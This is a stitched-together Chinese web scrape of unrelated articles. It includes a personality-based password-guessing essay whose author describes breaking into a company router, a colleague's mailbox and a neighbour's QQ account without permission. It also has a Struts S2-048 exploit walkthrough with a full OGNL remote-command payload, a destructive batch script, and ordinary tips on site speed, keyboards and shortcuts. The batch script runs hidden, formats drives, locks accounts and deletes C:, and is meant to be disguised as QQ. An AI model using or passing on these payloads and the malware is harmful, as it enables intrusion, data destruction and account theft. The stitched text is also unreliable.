密码。双子座和水瓶座使用密码的规律最难以捉摸。上述总结的内容正确与否还有待进一步验证，你也可以从上面找到一种你认为最符合你性格特征的类型，结合你自己的密码进行验证，看看我说的准不准。第六部分：密码破解案例示范一、破解某公司会议室路由器密码公司信息：IT行业；公司名称两个汉字，全部拼音为10个字母；英文简写为4个字母，假设为abcd；会议室在16楼，号码已经忘记，以1601作为示例。路由器类型：TP-link品牌某型号路由器，登录地址为192.168.1.1，不具备无限功能，有线登录时也需要账号密码网管人员：认识的人，性格有点墙头草，容易左右摇摆；一旦跟他说话时语气强硬，对方则深怕会得罪你的样子；开会时经常心不在焉，说话有时不着边际；做事拖沓，有头无尾破解过程：首先，分析网管人员的性格特点，由于是IT从业人员，因而通常具备较强的密码保护意识，因而不大可能使用无脑型密码，此外，从此人做事的习惯来看，可看出其对专业服务意识及自我认同度较差，不大可能使用严格的加密法。其次，上述性格类型的人通常有一种不安全感，因而，其设置的密码不大可能使用他自己的个人信息；此外，做事不认真的人通常有一定惰性，其设置的密码不会太长，八位至十位是最有可能的位数。其三，由上述两条可以判断，密码使用最大的可能要么是公司名全部拼音的10个字母，要么是英文缩写的简单重复或者英文缩写加上1601，也有可能是房间好 的简单重复；进一步分析，此网管头脑简单，通常他宁愿使用16011601这样的序列，也不会有那心情去对后面的那个1601进行倒序。最后，账号名通常会使用约定俗称的字母组成，且很可能是4位到6位，所以，账号很大可能是公司简称abcd。最终结果：账号：abcd密码：16011601从密码逆推网管人员的性格：平时对其印象完全正确，此人可做朋友，因为他没有什么心机，不会害你，但不可共事，因为缺乏责任感。日后项目重要节点的相关事项尽量不能托付给他，即使不得 已托付此人，也必须保持高度警惕，不时跟进。然而，非常遗憾的是，最后关头我依然险些栽在此人手里，那是为了校对数据，由于当时系统有多个平台，而校对数 据必须在真实平台上进行，在校对前，我特意向他用邮件和电话确定真实平台地址，后来安排了自己公司和合作单位的20几个人校对了整整一天，最后还是发现此 人给我的地址是个测试平台地址，气得老子当着公司和他们公司领导的面狠狠地耍了一回酷，不过气归气，工作却得从头再来，于是只好一边找了10几个人，说了 半天的好话，熬到半夜两点多才把所有数据校对完毕，庆幸总算没有拖慢项目进度！二、破解某同事个人密码对象个人信息：IT公司中层经理，多个项目参与者及主要负责人；做事认真，有条不紊，名牌大学毕业；为人圆滑、精明——应该说我很少遇到这么聪明的人；对自 己的业务能力极度精通，在公司人称“鬼才”；性格平和，对下属非常宽容，经常面带微笑，拥有很强的人格魅力；思维严谨，经常看有关人性和数学方面的书籍破解过程：首先，由于此人从属于IT行业，加上拥有很高的智商，因而通常拥有很强的密码保护意识，绝不可能使用无脑型密码——应该说，觉得他会使用无脑型密码就是对他智商的侮辱。其次，他也不大可能会在密码中透露自己的个人信息和爱人的身份信息，使用广州家里的电话号码，办公室号码和手机的可能性也不大，除非是老家的电话号码。再次，由于其强烈的密码保护意识，他的密码通常会比普通人的要长，有可能会达到13位以上。再次，最大可能是此人会使用“图腾”，由于其思维的严密性，喜欢数学，空间思维能力较强，会比较注重对称美，加上强烈的密码保护意识，很有可能会使用下划线，并且下划线的位置会高度体现对称美。再次，其使用的图腾极有可能是很多人平时容易忽略的常识性意象物，并且很有可能与其爱好有关，这时候一个意念物在我脑中一闪而过——圆周率π！印象中第一 次接触这个常数倒不是在数学课，而是在历史课上，现在依然记得老师跟我们吹嘘的中国历史，还记得祖冲之以及“3.1415926至3.1415927之 间”这句话。的确，对于一个酷爱数学的人来说，如果在数学世界里采用某个常数作为密码的意象物，还有什么比这个东西更合适的？——既是圆身上的东西，本身 就是完美的象征，同时其通常被记住的位数是8位，在长度上也非常符合密码使用的习惯。最后就是组合了，小数点很有可能会采用下划线或者p(point)代替，首选3.1415926，这其实是一个无限循环的数字，而无限的符号我们知道，是 一个横着写的8，对于高度注重对称美的数学爱好者来说，很可能会在数字和无限之间进行一下区分，于是，我首先想到的两个密码是3_1415926_8还有 3p1415926_8，用其邮箱进行验证，结果均失败，数一下长度，只有11位，而且第一个还没有字母，而前面说过，通常使用下划线的人密码保护意识是 很强的，通常使用了下划线，那么，其密码很可能包括数字和字母——字母嘛，首先想到的当然是他的名字缩写，为了不透露他的个人隐私，假设他叫张三好了。最 后，当我破解了他的密码的时候，我差点兴奋得跳了起来，足足高兴了几天，连睡觉都合不拢嘴！女朋友很好奇问我为什么这么高兴，我一直都是笑而不语！最终结果：密码：zs_3_1415926_8从密码逆推此君的性格：此人对自我要求很高，有强烈完美主义倾向——从使用圆周率作为密码并且密码体现高度对称美可以看得出来；其次，此人自信但不自负，如果非常自负，那么，他完 全没有必要在在最前面使用自己的姓名，因为通常来说很少有人会想到用圆周率这种意象物作为自己的密码，自负的人会认为使用圆周率已经足够；这种人通常胸怀 宽广，能接受别人的意见或者建议，经常会反躬自省自己的错误并予以改正，生活中，他会是一个良师益友，工作上，他会是给力的伙伴，既可深交也可共事。但 是，其缺点是做事一旦关乎自己，有时候会过于追求完美，从其密码所使用的下划线高度体现对称可以看得出来，这种人打工迟早会成为一个优秀的项目管理人或高 层经理，但是，开拓自己的事业却不容易打破常规。不管怎样，在工作过程中我一直与此君相处得很好，从来没有红过脸，对我这个脾气暴躁的人来说这是甚为难得的，很大一部分原因我想是源于我对他发自内心的尊重，甚至当我知道了他的密码以后，一直以来还带着深深的负罪感和愧疚感，因而都很少联系他了！三、破解某邻居的QQ密码对象个人信息：85后，男性，每天都见面，每次见面时都会彼此很客气地打招呼，聊过几次天；聊天过程其发音非常清楚，说话偶尔会骂两句，说话简洁，非常富有条理性，极少包含“那个”，“然后”这种潮汕人俗称“话屎”的词语；他对社会上的一些现象非常强烈的反感；眼神清澈，给人的感觉非常阳光，健康；有时爱与我聊中国古文化，西方启蒙时期的哲学与思想，并且一聊起来双眼发光，极其兴奋。破解过程：首先，聊天时知道了他的出生年份1987年，同时还知道了他的名字，假设为“李四”，还知道他出身于农村。其次，眼神清澈，而且一见面就愿意向你敞开心扉讲心里话的人通常涉世未深，通常缺少防范意识，这类人的密码保护意识通常也比较差，猜测其密码有可能是姓名加上出生年月日的组合。再次，说话条理清晰，不带任何“话屎”，而且喜欢聊哲学，这让我想起我的很多射手座朋友，以次推断他可能属于射手座。再次，射手座生于每年的11月23日——12月21日，尝试用他的名字拼命lisi加上19871201这样的组合进行测试，尝试大约三十次全部失败。突然，我想得他来自农村，父母在80年代那个时候，极有可能仍在使用农历，因此，注册他身份证的时候，很有可能跟我一样采用农历，上网用万年历查下 1987年阳历11月23日——12月21日这段时期所对应的农历日期，对应的农历时间段是10月初三至11月初一。最终结果：密码：lisi_19871011从密码逆推此君的性格：此君懂得使用下划线，说明他还有一定的密码保护意识，但是，从其使用自己姓名加上生日这一点可以判断他社会经验缺乏，应该较少与社会上的人接触，应该是宅男 一类的人，工作不可能是销售类和管理类，很有可能是技术类。这种人通常比较爱交朋友，也非常值得交往，是那种你有万贯家财，到了重要的时候都可以放心托付 给他一类的人。后来与他进一步的交往中一步步印证了我的论断。第七部分：个人密码加密建议需要使用密码的场合通常是银行的账号，其他的绝大多数则通常是上网的各种邮箱、某些客户端软件、或者论坛的登录密码。绝大多数人上网时候都会使用一个固定的 密码，而且基本上没有修改密码的习惯，因此，只要你在某个论坛的密码一旦泄露，那么，很可能你的所有邮箱、游戏账号等密码都会被人家一锅端。存在这种现象其实很容易理解，就是因为人的惰性，而且现在的网站那么多，如果针对各个网站去设置不同的密码，对于很多人来说，几乎是不可能完成的任务，因为这样你不仅需要记忆几十个甚至上百个密码，还必须记忆各个密码与各个网站的对应关系。其实，有一种办法可以保证你的密码可以随着不同网站而进行变换，同时又不需要记忆对应关系的。以下就以这种方法作为切入点，对大家的密码设置提供一些建议，这种办法我们不妨命名为“随机有据字符加固定序列密码”。一、随机有据字符加固定序列密码这个名词拥有三个关键词——随机、有据、固定。先说“固定”，固定就是指你经常使用的密码，在你每个密码中都会出现的一个字符段，假如你已经用惯了某个密 码，并且这个密码你把他用在绝大多数的地方，那么，就以这个密码作为固定序列，放在你新密码之中；所谓“随机”，指的是你设置的时候事先并不知道要设置什 么样的字符，而是根据不同的网站或客户端进行变动，但是，其变动是有规则的，这个规则是你自己定的，而且不会让任何人知道；所谓“有据”，这个根据，则与 网站的某一种要素挂钩，我推荐使用网站的名字，目的是方便你自己的记忆。以下我举个例子，你就会很清楚地理解这种所谓的“随机有据字符加固定序列密码”的 特点了。假如你以往所常用的密码是qwert123，那么，在你的新密码中，同样保留这个字段，现在你自己定义这样一种规则：以网站的名称作为依据，登录任何一个 网站，就以其名称作为参照物，截取其名称的第一个字母（或数字）和最后一个字母（数字），分别放在固定密码段的开头和结尾。例如：上新浪网，其名称为 sina，那么，分别截取s和a，添加在你的固定密码组开头和结尾，那么，你在新浪上的密码就是sawrt123a；如果是迅雷的客户端，取其网站名 Thunder的首字母t和最后一个字母r，这样你的迅雷地址就变成了tawrt123r，由于多了这样一层保护，那么，即使你的新浪微博密码丢失了，那 么，别人也不容易用这个密码来盗取你的迅雷账号、qq号码，而且由于这种密码命名规则简单，你完全可以照用你原来的密码段，不用去修改密码输入的习惯。上述的命名规则完全由你自己来定，除了那种截取头尾的规则以外，还可以这样：截取网站名的首个字母或数字，同时数一下这个网站名的位数，如果是奇数，字母 取大写；如果是偶数，字母取小写，将它加到你固定密码组的开头或者结尾；如果截取到的是数字，那么，同样数一下网站名的位数，如果是奇数，那么保留这样一 个位数，如果是偶数，则将其双写，加到你的固定密码序列上。示例：sina，baidu，163和2144，sina包含4个字母，所以截取第一个字母的 小写s；baidu是5个字母，于是截取其第一个字母的大写B；163是3个字符，于是取其第一个数字1,2144是4个字符，于是取其第一个数字的复写 22，添加到你的固定密码组上，于是，你的新浪密码是sqwert123，百度密码则变成了Bqwert123，网易邮箱变成了 1qwert123,2144网站的密码则变成了22qwert123。总之，怎么组合就看你自己考虑了，但随机段截取的规则一定要清晰可行，并且自己要牢记，而且随机字段包含的信息越少越好，太多未必能保护自己的密码，相反更容易让有心人发现规律。二、关于固定字符段的建议坚决不使用自己证件上所能查看到的信息，包括生日、证件号码、姓名及其缩写等等，同样也坚决不使用爱人和孩子的同类相关信息。更不要使用无脑型密码。可以使用电话号码，但是电话号码尽量使用老家的电话号码，并且对该电话号码添加或者减少一至两位的防盗码。可以使用爱人的昵称，但这个昵称最好是只有你和对方彼此知道的，尤其是互相吹枕头风的时候才使用的那种称谓。对于银行卡密码，如果你非要向爱人表达爱意，也可以使用你们的结婚纪念日或者其生日，但是一定进行诸如倒序、移位、加码等相关操作。例如：你们的结婚纪念 日是2012年7月5日，你非要使用201275或者120775这样的数字，用倒序的观点，就成了572102和577021,；用移位的观点，不妨设 置成720125或者071275；用加码的观点，可以是只加一位，变成201276和120776，也可以每位加1，312386,231886，什么 规则由你自己选择，关键是你自己要容易记住，而别人又难以看懂。不要小看这种简单的操作，它很可能就是防止你密码泄露的关键。不需要考虑对称美，密码又不是让人看的，相反是见不得光的，见不得光的对称只能是孤芳自赏，因而，建议你采用下划线或者数字的时候，将其打乱之后插入字母中，最好其结构是一旦写出来会让人看着很别扭的那种——看着越别扭的密码越是好密码，相信我没错的！强烈建议使用图腾，因为那是你内心深处的东西，有时候即使是你最亲密的人都未必真正了解你内心深处在想什么，陌生人更加难以猜测。某些字母和数字之间由于形很相似，因而，当你需要使用数字时，不妨用字母进行一下伪装，反之亦然。包括1和l，2和z，6和b，8和B，9和q，0和o。没有必要定期修改你的固定字符段，那个意义不大，相反很可能会很容易就把自己弄晕，当然前提是你能做到上述提到的那些密码规则。三、关于安全问题的建议现在有很多网站尤其是论坛，为了所谓的安全性考虑，用户注册时通常会要求设置安全问题，以我自己的经验来看，那几乎是毫无作用的，这些安全问题通常会让你从 8个左右的问题选择一个进行回答，很多人为了简单易记，通常会选择生日，这本来是没有什么问题的，问题在于电脑是没有智能的，它没有所谓的时间概念，相 反，却有严格的格式概念，例如：某人生日是1980年1月1日，对于人来说，当某人问起你生日的时候，无论你是回答1980年1月1日，还是80年元旦， 亦或是800101，都是一个概念，这个概念指向同一个目标，这个目标就是时间。然而对电脑来说，这几个却是完全不同的概念，对于电脑来说 19800101与8011有着极大的差别，因而，有可能一些不同网站问你的是同一个问题，但是你在回答的时候却使用了不同的格式，这样注册多了，最后很 可能连你自己都搞混了，有时候甚至会导致你自己连密码都修改不了。因而，我的习惯是除非网站指定安全问题为必填，否则我一律不填，如果填的话，我会随便选择一个问题，并且任何网站的任何安全问题，我都使用同一个标准格式，以前我使用的是“关你鸟事啊”，电脑问我你小学上那所学校啊？你爱人叫什么名字？我都一律回答“关你鸟事啊”——本来我怎样就不关你电脑你的事，还不 是“关你鸟事”吗？！

您需要登录并回复后才可以查看该文章内容

一、S2-048 漏洞综述1.1 漏洞背景2017年7月7日，Apache Struts发布最新的安全公告，Apache Struts2-strus1-plugin插件存在远程代码执行的高危漏洞，漏洞编号为CVE-2017-9791(S2-048),主要受影响的Struts版本为：2.3.x。攻击者可以构造恶意的字段值(value)通过Struts2的struts2-struts1-plugin的插件传递给被攻击主机，从而实现远程代码执行攻击，直接获取远程主机的控制权限。1.2 漏洞产生原因这个漏洞主要问题出在struts2-struts1-plugin这个插件包上。这个库的主要作用就是将struts1的action封装成struts2的action以便它能在strut2上运行使用。而由于struts2-struts1-plugin 包中的 “Struts1Action.java” 中的 execute 函数可以调用 getText() 函数，这个函数刚好又能执行OGNL表达式，同事这个 getText() 的 参数输入点，又可以被用户直接进行控制，如果这个点被恶意攻击者所控制，就可以构造恶意执行代码，从而实现一个RCE攻击。1.3 漏洞影响范围Apache Struts 2.3.x系列中启用了struts2-struts1-plugin插件的版本都在其影响的范围内。二、漏洞环境部署2.1 漏洞环境包本次漏洞演示，我们可以直接使用struts2.3.x环境下自带的struts2-showcase演示demo示例环境，进行S2-048漏洞复现，故这里我们只介绍下struts2.3.x的环境包。(struts2-showcase 演示环境就存S2-048漏洞)struts2.3.24环境包下载地址：http://archive.apache.org/dist/struts/2.3.24/2.2 Tocat环境部署工程师可以直接安装一个XAMPP套件，其默认就带有tomcat的支持,可以直接拿来进行struts环境的部署。(1)启动tomcat服务 (2)Tomcat 环境访问 2.3 S2-048漏洞环境部署(1)解压struts-showcase下载完struts2.3.24环境包后，我们直接将其“strus-showcase.war”的demo包解压到tomcat的webapps环境目录下(具体路径依据个人实际环境来定，可参考下图路径)。 (2)重启tomcat服务自动部署war包tomcat中有关war的部署比较简单，我们只需要将相关的war包放到tomcat的webapps目录下后，重启tomcat服务后，war包就会被自动解压部署。 (3)漏洞环境访问本struts2-showcase demo示例中有关S2-048漏洞的触发点在“Struts 1 Integration”(S1 整合)处，具体位置可参看下图。 (4)漏洞环境验证我在这漏洞出发点可以直接使用OGNL语法直接操作一个运算 10-7，看其是否可以直接运行并输出结果，通过验证发现果然可以直接执行并输出正确的结果。  三、漏洞检查与利用脚本3.1 工具准备有关漏洞的检查与利用，这里已经收集好了相关的利用poc与脚本，相关使用方法都已经梳理输入如下，大家使用时，可以参考使用。(1)工具包下载地址https://github.com/W3bSafe-Team/Struts2-048-poc(2) POC 使用方法 (3) shell 验证exp 3.2 漏洞检测一般，我们在进行漏洞利用之前肯定需要进行漏洞的检测与确认，这里直接使用前面下载的工具包中的一个批量检测的POC(Struts048-POC.py)，用其进行S2-048漏洞的检测，具体检测过程如下。(1) 创建一个url.txt文档，将需要检测的URL连接收集放入其中，这里进行漏洞触发点的检查时，我们收集了多个目录，其中包含了struts-showcase demo目录下的各个路径以及部署tomcat根目录，看看漏洞的触发是否有规律可循。 (2) 创建一个临时文档tmp.txt,必须创建，否则脚本执行会报错。 (3) 直接运行此python脚本; 通过POC对各个URL进行检查后发现，只要是在struts2-showcase目录下的路径，都可以做为漏洞触发的利用点，而不在此目录下，漏洞无法触发。(那么在这里也告诉我们有关此S2-048漏洞的修复方法，就是删除或者禁用此目录。)3.3 漏洞利用复现接下来，我们使用网络上提供的检测脚本和抓包截断的利用方式分别复现下漏洞的利用过程。3.3.1 shell脚本利用复现利用上一个章节检测出的三个可以利用URL，我们直接使用漏洞利用shell进行漏洞利用复现。注：由于需要使用Linux环境才能运行shell脚本，我这里开启了kali,并将URL中的127.0.0.1的地址替换为10.48.8.234，请大家在看截图过程，希望不要有什么疑惑。(1)URL1利用：http://10.48.8.234:8080/struts2-showcase/integration/editGangster.action (2)URL2利用：http://10.48.8.234:8080/struts2-showcase/integration/ (3)URL3利用：http://10.48.8.234:8080/struts2-showcase/ 通过上面针对三个URL漏洞触发点进入S2-048漏洞直接getshell利用验证，更加严谨的证实了只要是在showcase demo目录下的URL路径都可以直接被利用。3.3.2 抓包截断利用复现如果我们仔细查看最近爆出的S2-045、S2-046、S2-048，该漏洞利用的payload 其实都是一样的，不同的仅仅是触发点不同，影响范围不同而已。S2-045的影响方位最广，只要是使用当时的Struts2框架的系统基本都在其影响的范围内，而后面的S2-046和S2-048漏洞的漏洞触发点有一点的限制条件，本次S2-048漏洞的利用条件就是你在使用了 struts2-struts1-plugin插件的情况下，才会触发漏洞的产生。这里我们就复现下，使用与前期S2-045漏洞利用Content-type字段来传递攻击payload到目标主机的方法，来复现下S2-048漏洞的利用。3.3.2.1 攻击payload准备我直接使用前面下载的shell脚本的中的payload进行后续的抓包截断攻击的演示复现。%{(#nike='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='whoami').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())} 3.3.2.2 抓包截断攻击(1)第一步：首先使用burpsuite截断“http://10.48.8.234:8080/struts2-showcase/integration/editGangster.action”访问;  (2)第二步：将当前截断数据包发送到repeater模块，修改content-type字段为攻击payload; (3)第三步：修改payload命令执行字段为"whoami",发送攻击包; 这里我将shell脚本中的045,046,048的payload攻击载荷都放入burpsuite的repeater模块进行了重复发包验证，发现都可以利用成功，具体验证情况如下。S2045 Payload验证截图  S2046 Payload验证截图 通过上面burpsuite重复发包验证，S2045、S2046、S2048的攻击payload都可以对S2048漏洞进行远程命令执行，获取主机的控制权限，这里我们会发现上半年暴露出的“S2045、S2046、S2048”攻击载荷都是一样的，只是漏洞的触发点不同而已。以上观点仅个人漏洞复现利用归纳总结所得，如有什么有误的地方，有路过的大神能给以指定，这里谢过。四、 S2-048 漏洞修复与加固(1)直接禁用 struts2-struts1-plugin插件;(2)对于如果启用 struts2-showcase 演示示例系统，应立即删除本演示示例;(3)升级当前struts2 到最新版本;(4)不要相信用户端的任何数据输入，建议开发者通过使用resource keys替代将原始消息直接传递给ActionMessage的方式，如：messages.add("msg", new ActionMessage("struts1.gangsterAdded", gform.getName()));漏洞学习参考1. Struts2高危漏洞S2-048动态分析http://www.moonsec.com/post-776.html2. Struts(S2-048)远程命令执行漏洞分析http://www.sohu.com/a/155509766_2903043. Struts2-048 Poc Shell版本(附修复方案)https://bbs.ichunqiu.com/thread-24504-1-1.htmlhttps://github.com/W3bSafe-Team/Struts2-048-poc4. Apache 官方说明https://cwiki.apache.org/confluence/display/WW/S2-048 文章转载于51CTO.com

阿伯丁集团曾对用户进行调查，结果显示，网站页面加载时间每延长1秒，就会减少11%的页面浏览量，降低16%的客户满意度，降低7%的转化率。亚马逊也通过调查证实，网页打开的速度每提高100毫秒，能为网站增多1%的收益。类似的证实还有很多，网页打开的速度直接关系到网站的收益，已毋庸置疑。这就是为什么今天的企业和个人尽其所能来减少网页加载时间的原因。时间就是金钱，对于网站来说，是以微秒来计算的。网页加载时间的大幅加快，也会带来转换比例的增加。如何提高网站速度1.图片优化统计数据显示，用户倾向于放弃一个在3秒内未加载完成的网页。由于加载图片占据了网页上可下载的大部分字节空间，所以影响网页下载时间的关键来自于图像优化。确保正确的图像优化的最佳方法之一是采用正确的大小和格式（JPEG、GIF或PNG）。我们的目标是在不影响图片质量的情况下尽可能地缩减文件大小。2.尝试CDN加速内容交付网络的价值在于它可以获取一个网站的静态文件，如CSS、图像和JavaScript，并通过更接近用户物理位置的Web服务器传递它们。更短的接近等于更快的加载时间。像AWSCloudFront或者CloudFlare都是很好的CDN加速。CDN另外的好处是，即使停止加载带宽，你依然可以降低在下载高峰时期的中断风险。从各个方面看来，CDN都能带来双赢的局面。3.缓存缓存是Web页面临时存储的一种机制，可以减少带宽并提高性能。当访问者到达您的站点时，缓存模式即启动。这样可以节省服务器时间，提高效率。启用浏览器缓存会让重复访问的访问者更快速的访问站点。4.压缩Gzip是一个用于文件压缩软件的应用，就像是把你的网站变成一个zip文件。大多数服务器和客户支持Gzip。当一个Gzip兼容浏览器请求服务器将响应发送给浏览器资源，可以显著减少网站的时间延迟。5.简洁的代码让你的代码更简洁是非常有必要的。这意味着打包压缩你的HTML、JavaScipt和CSS文件到更小的文件中来运行。例如，如果您的移动网站有五个JavaScript文件，浏览器将发出五个单独的HTTP请求来获取它们。为减少堵塞和等待时间，另一种方法是缩小和连接这5个文件到一起。6.检查你的Web主机减少网站页面加载时间的另一个简单方法是检查你的主机提供商，看看你有什么样的软件包。共享托管帐户经常涉及与其他数十家公司共享服务器空间，这些网站的速度受到使用服务器的人数的影响。如果是这样的话，那么可能是时候考虑一个专用的访问服务器计划了。

只是一个批处理文件，菜鸟的小招数，高手绕道 首先新建一个文本文档 在开头输入 if  not  "%1"=="wkdxz"  mshta  vbscript:createobject("wscript.shell").run("""%~f0""  wkdxz",vbhide)(window.close)&&exit 上面这段代码也可以不输入，但是如果少了这段代码就会显示着运行，这段代码起到了隐藏运行的作用  （但是部分杀毒软件询问是否运行） 然后回车输入下面的Huang色字体内容： @Echo  off  echo  y   for  %%a  in  (d  e  f  g  h  i  j  k  l  m  n  o  p  q  r  s  t  u  v  w  x  y  z)  do  format  %%a:  /q  /u  /x  /y 上面这一段代码的意思是快速格式化D到Z盘的所有内容。没有则掠过 再回车输入 cd  c:\ attrib  +s  +h  "windows" attrib  +s  +h  "Program  Files" attrib  +s  +h  "Documents  and  Settings" 这段代码是切换到C盘，并且隐藏C盘重要文件，将其设置为系统只读隐藏文件。 然后回车输入 cd  C:\Documents  and  Settings\Administrator\桌面 attrib  +S  +h 上面是隐藏桌面 继续回车输入代码 net  user  administrator  nisidingle net  user  guest  nihuile 这段代码意思是将计算机的administrator（超级管理员）账户和Guest（来宾账户）设置密码，分别是“你死定了”和“你毁了”的汉语拼音 接着回车输入 shutdown  -r  -t  60  -c  "敢惹老子！你死定了！" 这段代码是设置1分钟关机的，并且会提示：敢惹老子！你死定了 也可以把提示换成别的，只要在120个字之内 最后回车输入 net  user  administrator  /active:no 最后这段代码将直接禁用Administrator用户，别人将重启后将无法进入系统 然后回车输入 del  /f  /s  /q  c:\*.* 这句命令是删除C盘所有能删除的文件，并且也删除了shutdown和net这两个DOS命令，使对方无法解除关机 最后一步把txt文件改成bat文件，更改文件图标为QQ或其他常用软件，重命名；只要双击后，你的电脑基本就毁了 

电脑键盘的shift键失灵了如何恢复的解决方法。我们在使用电脑的时候经常会用到电脑上的shift按键，因为shift按键经常会和别的按键组合快捷键。但是当shift按键失灵的时候，我们应该怎么办呢？一起来看看吧。　　shift键失灵怎么办?　　1、请您点击开始菜单—控制面板—轻松访问中心—点击下面的键盘图标—“设置筛选键”按钮，查看“启用筛选键”前面是否有勾，如果有，请将勾去掉，最后点击“确定”后退出试试。　　2、如果您有外接USB键盘，您可以连接后测试USB键盘上的SHIFT键是否可以正常使用。您也可以开机按F8键进入安全模式测试它们是否可以正常使用。　　3、请您查看是否对shift按键进行了设置。例如，您可以查看是否启用了粘滞键，请您连续点击5次shift按键，这个操作可以取消粘滞键功能(粘滞键功能可能会引起键盘无法使用)。       4、请您对系统进行杀毒，以免系统中毒了。建议您备份数据后恢复BIOS默认值试试，方法如下：　　家用笔记本：您开机时连续点击F10进入BIOS，选择Exit选项，选择loadsetupdefaults—yes，再选择Exit--exitsavingchanges—yes，就可以保存后退出了。　　商用笔记本：您开机后连续点击F10键进入BIOS，在File中选择RetoreDefaults，点yes，再选择SaveChangesAndExit，就可以保存后退出了。　　5、如果问题依旧，但USB键盘的SHIFT键可以使用，并且您确认系统没有问题，那么这个情况有可能是由于笔记本键盘的两个SHIFT键有故障造成的，为了不耽误您的使用，建议您联系当地笔记本服务中心进行处理。　　shift键有什么用?　　1、切换中文和英文：在输入法上直接按shift键即可切换2、快速删除文件：shift+Delete　　3、更改打开方式：按住shift键，然后在点击选择文件夹，即可新增加一个“打开方式”的选项。　　4、启用粘、筛键：连按5次，即“粘贴键”的快捷方式;       5、筛选键：按右shift键8秒以上为“筛选键”的快捷方式。　　6、重启电脑：先按shift键，然后按确定按钮即可重启。        对于我们在遇到了电脑中的shift按键失灵的时候，我们就可以利用到上面给你们介绍的解决方法进行处理，希望能够对你们有所帮助。

1、有时候要离开电脑去做其他的事，而你又不想在你离开的时候有人偷看你的电脑，这时候，你可以选择按住windows键不放，然后按L键，将你的电脑锁屏，这样别人就没法偷看你的电脑了！2、我们经常要打开【我的电脑】找文件，而有的时候，因为桌面图标太多，找半天也找不到【我的电脑】，这时候，你可以选择按住windows键不放，然后按E键，直接进入【我的电脑】。3、有时候我们打开的窗口太多，然后又想返回桌面打开某个文件时，一个个窗口最小化或者是关闭实在是太麻烦了，这时候，我们可以选择按住windows键，然后按D键，唰地一下，瞬间闪回桌面，怎么样，酷不酷？4、正在看新闻，老板突然来袭，怎么办？这时候，你可以选择按住Alt键不放，然后按Tab键，瞬间切换屏幕，论反应速度，我谁都不服，只服你！5、想要找某个文件，而你知道它的名字，却不知道它放在哪里？这时候，你可以选择，按住windows键不放，然后按F键，输入你所知道的文件的名字进行搜索。需要注意的是，在打开搜索界面后，一定要选择搜索的路径，要不然，会没有结果。6、Windows系统中，有一个功能是非常好用的，那就是【运行】，按住windows键不放，然后按R键，我们就可以打开它。然后：在里面输入cmd，我们可以打开命令提示符，输入命令进行一些特别的操作。在里面输入msconfig，我们就可以打开系统启动项，对电脑进行优化。在里面输入mstsc，我们就可以打开远程桌面，远程连接其他计算机。在里面输入gpedit.msc，我们就可以打开组策略，修改一些计算机设定。还有更多功能，不足以一一道来。怎么样？方便不方便?7、在windows系统中，处理文件时，有三兄弟是特别好用的，它们分别是组合键【Ctrl + x】、【Ctrl + c】和【Ctrl + v】。当你要剪切某个文件/文件夹，又或者某段文字时，这时候只需要按住Ctrl键不放，然后按X键，瞬间完成剪切的操作。同理，当你要复制某个文件/文件夹，又或者某段文字时，这时候只需要按住Ctrl键不放，然后按C键，瞬间就完成复制的操作。最后，在剪切或者复制完成之后，只需要按住Ctrl键不放，然后按V键，那么你剪切或者复制的内容，就可以粘贴到你想要粘贴的地方了。8、说到选择文件，还有一个快捷功能也是特别好用的，那就是【Ctrl + a】，它能让你瞬间选中文件夹中所有的文件，或者是文档中所有的内容，然后再进行剪切复制删除等其他操作。9、关于删除， 也有快捷键，对于文档中的内容，我们在可以选中内容后，使用【Delete】这个键，进行删除。而对于文件，我们在可以选中后，使用【Ctrl + d】，把它丢入回收站。10、有没有遇到过这样的事？正在处理一个文件，辛辛苦苦忙活了大半天，突然，电脑关机了，瞬间崩溃！其实对于这种情况，有一个快捷键可以很好地帮上你的忙。【Ctrl + S】这个键主要是用于保存文件。当你在处理文件时，隔一会儿习惯性地用一下【Ctrl + S】，那么就不怕电脑突然关机，而处理过的文件全部白费了。11、人不是机器，不可能有百分百的准确率，完全不出错，那么在处理文件的时候，如果犯了不可挽回的错（比如说误删文件/或者误删文件内容），那怎么办呢？用快捷键【Ctrl + Z】来让抢救一下你的失误吧！【Ctrl + Z】的主要功能是撤销，就是取消你上一步的操作，让你有后悔药可以吃。